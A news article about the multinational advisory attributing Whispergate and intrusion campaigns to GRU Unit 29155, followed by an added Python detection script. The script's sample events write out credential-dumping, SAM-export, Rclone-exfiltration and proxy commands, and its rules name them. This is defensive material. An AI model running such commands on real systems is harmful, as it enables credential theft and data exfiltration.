The UK’s National Cyber Security Centre (NCSC) and its counterpart bodies in the Five Eyes intelligence alliance have joined partners from Czechia, Estonia, Germany, Latvia and Ukraine to identify a Russian military cyber unit that has been conducting a sustained campaign of malicious activity over the past four years.
Part of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation, or GRU, Unit 29155 has conducted multiple computer network intrusions over the years, deploying tools such as the Whispergate malware used in cyber warfare operations against Ukraine.
Whispergate, a malware not dissimilar to NotPetya, was deployed across Ukraine in advance of Russia’s illegal February 2022 invasion. It appears at first glance to operate like a ransomware locker, but that activity conceals its true purpose, which is to target systems’ master boot records for deletion.
That Whispergate was linked to Moscow’s intelligence services was already well-known but this is the first time that its use has been attributed to a specific advanced persistent threat (APT) operation.
“The exposure of Unit 29155 as a capable cyber actor illustrates the importance that Russian military intelligence places on using cyberspace to pursue its illegal war in Ukraine and other state priorities,” said NCSC operations director Paul Chichester.
“The UK, alongside our partners, is committed to calling out Russian malicious cyber activity and will continue to do so. The NCSC strongly encourages organisations to follow the mitigation advice and guidance included in the advisory to help defend their networks.”
Unit 29155, also designated as the 161st Specialist Training Centre, and tracked by private sector threat researchers variously as Cadet Blizzard, Ember Bear (Bleeding Bear), Frozenvista, UNC2589 and UAC-0056, is likely composed of junior active-duty GRU personnel, but is also known to fall back on third-party contractors, including known cyber criminals and their enablers, in the service of its operations. It differs to some extent from the more established GRU-backed APTs such as Unit 26165 (aka Fancy Bear) and Unit 74455 (aka Sandworm).
The NCSC said Unit 29155’s cyber operations selected and targeted victims primarily to collect information for espionage purposes, to deface their public-facing websites, cause reputational damage by stealing and leaking sensitive information, and sabotage their day-to-day operations.
According to the FBI, Unit 29155 has conducted thousands of domain scanning exercises across multiple Nato and European Union (EU) member states, with a particular focus on CNI, government, financial services, transport, energy and healthcare. The Americans say it may also have been responsible for physical acts of espionage including attempted coups and even assassination attempts.
Modus operandi
Unit 29155 frequently forages for publicly disclosed CVEs in the service of its intrusions, often obtaining exploit scripts from public GitHub repositories, and is known to have targeted flaws in Microsoft Windows Server, Atlassian Confluence Server and Data Center, and Red Hat, as well as security products from China-based Dahua, an IP camera manufacturer, and Sophos.
It favours red teaming tactics and publicly available tools, rather than custom-built solutions, which in the past has likely led to some of its cyber attacks being attributed to other groups with which it overlaps.
As part of this activity, Unit 29155 maintains a presence in the underground cyber criminal community, running accounts on various dark web forums which it uses to obtain useful tools including malware and loaders.
During its attacks, Unit 29155 generally uses a VPN service to anonymise its operational activity, then exploits weaknesses in internet-facing systems, including the CVEs mentioned above, to obtain initial access.
Once inside its victim environment, it uses Shodan to scan for vulnerable Internet of Things (IoT) devices, including IP cameras such as the Dahua ones mentioned above, and uses exploitation scripts to authenticate to them with default usernames and passwords. It then tries to perform remote command execution via the web interface of these vulnerable devices which, if successful, allows it to dump their configuration settings and credentials in plain text.
Having successfully executed an exploit on a victim system, Unit 29155 can then launch a Meterpreter payload using a reverse Transmission Control Protocol (TCP) connection to communicate with its command and control (C2) infrastructure. For C2 purposes, Unit 29155 is known to have used a number of virtual private servers (VPSs) to host its operational tools, conduct recon activity, exploit victim infrastructure and steal data.
Once it has access to internal networks, Unit 29155 has been observed using Domain Name System (DNS) tunnelling tools to tunnel IPv4 network traffic, configuring proxies within the victim infrastructure and executing commands within the network using ProxyChains to provide further anonymity. It has also used the open source GOST tunnelling tool, acting as a SOCKS5 proxy and renamed to java.
In a number of attacks, Unit 29155 has been observed exfiltrating victim data to remote locations using the Rclone command-line program, as well as exfiltrating various Windows artifacts including Local Security Authority Subsystem Service (LSASS) memory dumps, Security Accounts Manager (SAM) files, and SECURITY and SYSTEM event log files. Additionally, it compromises mail servers and exfiltrates artifacts including email messages via PowerShell.
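The post-access behaviours described above (DNS tunnelling, ProxyChains and a renamed GOST proxy, Rclone exfiltration, and collection of LSASS, SAM and event log artifacts) are all visible in ordinary endpoint and DNS telemetry. The script below is an added illustration of how a defender might flag them; it is not code from the advisory, the NCSC or Computer Weekly. The event format, field names, thresholds and the sample events are all constructed for this example, and the renamed-GOST heuristic relies on GOST's `-L` listen-address flag, which legitimate Java invocations do not use.

```python
"""
Added example: heuristic detection of the Unit 29155 post-access behaviours
described in the article, run over constructed sample telemetry.
Event schema (kind/host/query/image/cmdline) is an assumption for this example.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"kind": "dns", "host": "ws01", "query": "a9f3k2m8q1z7x4c6v0b2n5.exfil-example.net"},
    {"kind": "dns", "host": "ws01", "query": "b7h2j9l4p0r3t6w8y1u5i3.exfil-example.net"},
    {"kind": "dns", "host": "ws01", "query": "c2d5f8g1k4m7n0q3s6v9x2.exfil-example.net"},
    {"kind": "dns", "host": "ws02", "query": "www.example.com"},
    {"kind": "dns", "host": "ws02", "query": "mail.example.com"},
    {"kind": "proc", "host": "srv01", "image": r"C:\Users\svc\rclone.exe",
     "cmdline": "rclone.exe copy C:\\Share remote:bucket"},
    {"kind": "proc", "host": "srv01", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": "reg save HKLM\\SAM C:\\Temp\\sam.hiv"},
    {"kind": "proc", "host": "srv01", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil epl Security C:\\Temp\\sec.evtx"},
    {"kind": "proc", "host": "srv01", "image": r"C:\Temp\pd.exe",
     "cmdline": "pd.exe -ma lsass.exe C:\\Temp\\out.dmp"},
    {"kind": "proc", "host": "srv02", "image": "/usr/bin/proxychains4",
     "cmdline": "proxychains4 ssh admin@10.0.0.5"},
    {"kind": "proc", "host": "srv02", "image": "/tmp/java",
     "cmdline": "java -L socks5://0.0.0.0:1080"},      # GOST renamed to java
    {"kind": "proc", "host": "srv02", "image": "/usr/bin/java",
     "cmdline": "java -jar app.jar"},                   # legitimate Java
]

# Command-line rules for the collection and exfiltration tooling named in the article.
PROCESS_RULES = [
    ("rclone_exfil", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("sam_hive_export", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SAM\b", re.I)),
    ("eventlog_export", re.compile(r"\bwevtutil(\.exe)?\s+epl\s+(Security|System)\b", re.I)),
    ("proxychains", re.compile(r"\bproxychains\d?\b", re.I)),
    # Any command line that references the LSASS process or a MiniDump export.
    ("lsass_dump", re.compile(r"\blsass\b|\bminidump\b", re.I)),
]


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random-looking tunnel labels score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def dns_tunnel_suspects(events, min_label_len=20, min_entropy=3.5, min_unique=3):
    """Return {(host, base_domain): count} where a host issued several long,
    high-entropy subdomain queries under one base domain (tunnelling signature).
    The base domain is approximated as the last two labels (assumption)."""
    per_domain = defaultdict(set)
    for e in events:
        if e["kind"] != "dns":
            continue
        labels = e["query"].lower().split(".")
        if len(labels) < 3:
            continue
        base, sub = ".".join(labels[-2:]), labels[0]
        if len(sub) >= min_label_len and shannon_entropy(sub) >= min_entropy:
            per_domain[(e["host"], base)].add(sub)
    return {k: len(v) for k, v in per_domain.items() if len(v) >= min_unique}


def process_suspects(events):
    """Return [(host, rule_name)] for every process event matching a rule."""
    hits = []
    for e in events:
        if e["kind"] != "proc":
            continue
        for name, pattern in PROCESS_RULES:
            if pattern.search(e["cmdline"]):
                hits.append((e["host"], name))
    return hits


def renamed_gost_suspects(events):
    """Flag binaries named java whose arguments look like GOST's -L listener
    syntax (e.g. '-L socks5://...'); a real JVM never takes that flag."""
    out = []
    for e in events:
        if e["kind"] != "proc":
            continue
        name = re.split(r"[\\/]", e["image"])[-1].lower()
        if name in ("java", "java.exe") and re.search(r"-L\s+\S*socks5://", e["cmdline"]):
            out.append((e["host"], e["image"]))
    return out


def run(events=SAMPLE_EVENTS):
    return {
        "dns_tunnelling": dns_tunnel_suspects(events),
        "process": process_suspects(events),
        "renamed_gost": renamed_gost_suspects(events),
    }


if __name__ == "__main__":
    for category, findings in run().items():
        print(category, findings)
```

The rules key on command lines rather than image names because, as the renamed GOST binary and the renamed dumping tool in the sample show, the executable name is the one thing the operator controls cheaply. The DNS heuristic counts distinct high-entropy labels per host and base domain, which separates a tunnel (many unique labels) from a single odd-looking CDN hostname.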
More in-depth technical information, including new analysis of Whispergate, and mitigation guidance, is available from the US Cybersecurity and Infrastructure Security Agency in the main advisory notice. Defenders are urged to familiarise themselves with Unit 29155’s work and follow the recommendations laid down in the full advisory.